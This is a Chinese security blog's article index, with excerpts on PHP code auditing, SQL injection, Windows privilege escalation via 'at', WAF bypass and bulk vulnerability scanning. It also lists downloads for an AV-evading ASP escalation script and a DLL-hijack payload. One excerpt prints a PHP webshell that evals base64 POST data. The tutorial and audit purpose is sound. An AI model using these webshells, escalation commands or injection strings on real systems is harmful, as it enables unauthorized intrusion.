自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(26)
  • 资源 (2)
  • 收藏
  • 关注

原创 【PHP代码审计】如何搜索伪静态页面对应执行的php文件

目录0x001 查看重写路由规则的配置文件0x002 根据访问的url判断使用了哪条路由规则0x003 断点调试确认执行文件是否正确0x001 查看重写路由规则的配置文件我本地使用的apache0x002 根据访问的url判断使用了哪条路由规则url:http://127.0.0.1/dmjz/detail-9.html触发规则:RewriteRule ^/detail-([0-9]+)\.html /index\.php\?detailid=$1&ifalias=n&amp

2021-02-28 16:06:25 247

原创 【Windows提权】本地提权AT&SC&PS

目录0x001 at命令提权0x002 sc命令提权0x003 ps命令提权0x001 at命令提权at 命令提权的原理:at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限。适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除当我们拿到一个低权限的用户,通过3389端口远程连接上后,可以通过at命令来进行本地提权。at 12:31 /interactive cmd (在19:39分生成一个交互式的System

2021-02-27 13:01:19 1339 1

原创 【PHP代码审计】变量覆盖结合文件包含组合拳

目录变量漏洞覆盖介绍由$$变量赋值引发的覆盖结合文件包含变量漏洞覆盖介绍变量覆盖漏洞是指攻击者使用自定义的变量去覆盖源代码中的变量,从而改变代码逻辑,实现攻击目的的一种漏洞。通常来说,单独的变量覆盖漏洞很难有利用价值,但是在与其他应用代码或漏洞结合后,其造成的危害可能是无法估量的。例如购买商品的支付系统若存在变量覆盖漏洞,就可能存在0元支付下单的情况。漏洞产生的原因: extract() parse_str() import_request_variables() $$(可变变量)reg

2021-02-25 14:26:59 264

原创 【PHP代码审计】审计SQL注入

目录0x001 相关知识0x002 审计流程0x001 相关知识查询语句selectinsertupdatedeleteorder by内置函数:代码中使用相关过滤函数mysql_real_escape_string()addslashes()stripslashes()htmlentities()strip_tags()htmlspecialchars()is_int() 类型判断更多注入方式查看:https://blog.csdn.net/weixin_440

2021-02-24 18:07:02 194

原创 【PHP代码审计】ThinkPHP代码审计

目录0x001 开发方式0x002 审计流程1)启用调试开关2)版本查看3)定位函数4)测试是否存在漏洞5)版本自身漏洞0x001 开发方式在审计源码时根据不同的开发方式对应不同的审计方法。自写:有的站点虽然使用了thinkphp但并没有按照官方给的开发文档进行开发,没有引入内置的过滤机制导致出现安全问题。 (正常审计流程。)不安全写法:未全部引用内置过滤。(寻找没有引用内置过滤的地方。)规则写法:这种开发方式是相对安全的,因为框架的过滤机制比较完善。审计方式一般分为两种,寻找对应的版本漏

2021-02-24 18:04:50 1035 2

原创 【PHP代码审计】跨站及文件包含

目录0x001 跨站相关知识搜索关键字查看功能点0x002 跨站审计0x003 文件包含相关知识搜索关键字0x004 文件包含审计0x001 跨站相关知识如何审计相关漏洞???搜索关键字print print_r echo sprintf die var_dump var_export等查看功能点类似留言板,这种有输入输出的地方xss跨站:https://blog.csdn.net/weixin_44032232/article/details/1135505510x002 跨站审计

2021-02-23 16:00:43 129

原创 【渗透测试】常见数据库注入语句

目录0x001 SQLite注入0x002 DB2联合注入0x003 Oracle联合注入0x004 Mongodb闭合注入0x005 Sybase手工联合注入0x001 SQLite注入参考:https://www.cnblogs.com/xiaozi/p/5760321.html通常sqlite文件中会包含一个sqlite_master隐藏表。这里记录着你建表留下的记录,我们可以查看这个表名来看这些数据order by 4union select 1,2,3,4union select

2021-02-22 20:23:29 427 2

原创 【代码审计】审计基础

目录0x001 代码审计概念0x002 了解常见函数常用输出函数获取当前进程所有变量/函数/常量/类需要了解的超全局变量0x003 审计之初审计流程审计了解制定计划0x004 如何进行漏洞挖掘如何跳出传统的思维变量跟踪自动化的可行性0x005 审计工具0x001 代码审计概念代码审计,是对应用程序源代码进行系统性检查的工作。它的目的是为了找到并且修复应用程序在开发阶段存在的一些漏洞或者程序逻辑错误,避免程序漏洞被非法利用给企业带来不必要的风险。代码审计不是简单的检查代码,审计代码的原因是确保代码能

2021-02-21 13:59:53 947

原创 【自研工具】漏洞盒子批量提交脚本

目录1、填写漏洞模板2、批量提交脚本1、填写漏洞模板2、批量提交脚本开发原因:提交漏洞更方便,节省时间。web_xpath.pyweb_bug = { '反射型XSS': '//*[@id="submitform"]/div[5]/div/div[2]/div/ul/ul[1]/li[2]/a', '存储型XSS': '//*[@id="submitform"]/div[5]/div/div[2]/div/ul/ul[1]/li[3]/a', '基于DOM型XSS':

2021-02-16 16:12:04 3018 4

原创 【src挖掘】fofa联动xray批量刷src

目录1、利用fofa API收集目标2、使用xray批量验证1、利用fofa API收集目标需要安装python2# -*- coding: utf-8 -*-import timeimport urllib2import fofaimport jsondef write_url(urls): with open('xxx.txt','a+') as f: f.write(urls+'\n')if __name__ == "__main__": ema

2021-02-16 15:16:20 2852 2

原创 app抓不到包的几种原因

1 ssl pining(ssl证书验证)单向认证APP对服务端证书做校验 校验服务器的证书和域名。Fiddler/Charles等的证书肯定是校验不过的Charles安装配置:https://blog.csdn.net/Lu_GXin/article/details/105841312APP做ssl pining的几种方式:举例Python requests库对ssl的校验requests.get(url, timeout=1, verify=false)Python的几种网络请求方式

2021-02-15 11:32:38 3063

原创 漏洞发现

目录漏洞发现web服务类数据库类大数据类文件共享远程访问邮件服务其它服务漏洞发现web服务类数据库类大数据类文件共享远程访问邮件服务其它服务

2021-02-15 11:31:31 274

原创 WAF绕过

目录waf绕过代码拦截行为拦截waf绕过代码拦截变量覆盖<?php$a = $_GET['x'];$$a = $_GET['y'];$b(base64_decode($_POST['z']));// ?x=b&y=assert// $a=b $$a=assert $b assert($_POST['z']);?>加密混淆在线加密接口 https://www.phpjiami.com/phpjiami.html一个开源加密混淆 PHP

2021-02-15 11:31:16 209

原创 Java安全&JWT安全

2021-02-15 11:31:02 126

原创 XXE&XML之利用检测

目录XXE&XML之利用检测如何查找该漏洞?XXE&XML之利用检测如何查找该漏洞?查看请求的数据包中是否有xml格式的数据。如果有就可以构造payload发起请求,观察响应结果。造成该漏洞的原因就是对于该格式的请求数据没有进行严格的过滤。...

2021-02-15 11:30:40 100

原创 PHP反序列化

2021-02-02 13:14:28 154

原创 业务逻辑越权

2021-02-02 13:13:20 142

原创 文件操作安全

2021-02-02 13:11:50 160

原创 RCE代码及命令执行

2021-02-02 13:09:21 384

原创 SSRF服务器请求伪造

2021-02-02 13:08:27 98

原创 CSRF跨站请求伪造

2021-02-02 13:07:13 145

原创 XSS跨站

目录xss跨站xss工具使用防御vs绕过其它问题xss跨站xss工具使用XSStrike使用https://github.com/s0md3v/XSStrike#自动化工具说明XSStrike主要特点反射和 DOM XSS 扫描多线程爬虫||Context分析||可配置的核心||检测和规避 WAF||老旧的 JS 库扫描||智能payload生成器||手工制作的 HTML & JavaScript 解析器||强大的fuzzing引擎||盲打 XSS 支持||高效的工作流||

2021-02-02 13:02:33 275

原创 文件上传

2021-02-02 12:52:59 143

原创 sql注入

目录1 数据库注入2 sql注入数据库类型提交方法数据类型查询方式注入拓展WAF绕过3 MySQL注入信息收集高权限注入相关防注入1 数据库注入2 sql注入数据库类型Accesssqlmap判断是否存在注入 暴力破解回显index.php?id=1 order by 4猜表index.php?id=1 union select 1,2,3,4index.php?id=1 union select 1,admin,3,4 # 是否有admin表Access注入

2021-02-02 12:48:08 206

原创 【渗透测试】网站有cdn怎么办?

文章目录一、简介二、如何检测目标是否使用CDN?1)[超级Ping](https://ping.chinaz.com/)2)nslookup三、常见CDN绕过获取真实IP方法?1)子域名查询2)国外地址请求3)邮件服务4)遗留文件5)DNS历史记录6)SSL证书查询7)DDos攻击一、简介CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近

2021-02-02 12:16:21 1585

原创 信息收集

2021-02-02 11:49:48 122

dll劫持payload.dll弹出计算器

dll劫持payload.dll弹出计算器

2021-03-18

ASP超强提权免杀珍藏版.asp

mNametitle ="超强提权免杀珍藏版" Copyright=" 免杀珍藏版 " SItEuRl="http://caidaome.com/" bg ="http://www.baidu/newsjpg/0.jpg" ysjb=true htp="http://127.0.0.1" durl="http://caidaome.com/" Response.Buffer =true BodyColor="#f8f47e" FontColor="#f8f47e" LinkColor="#f8f47e"

2020-10-10

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除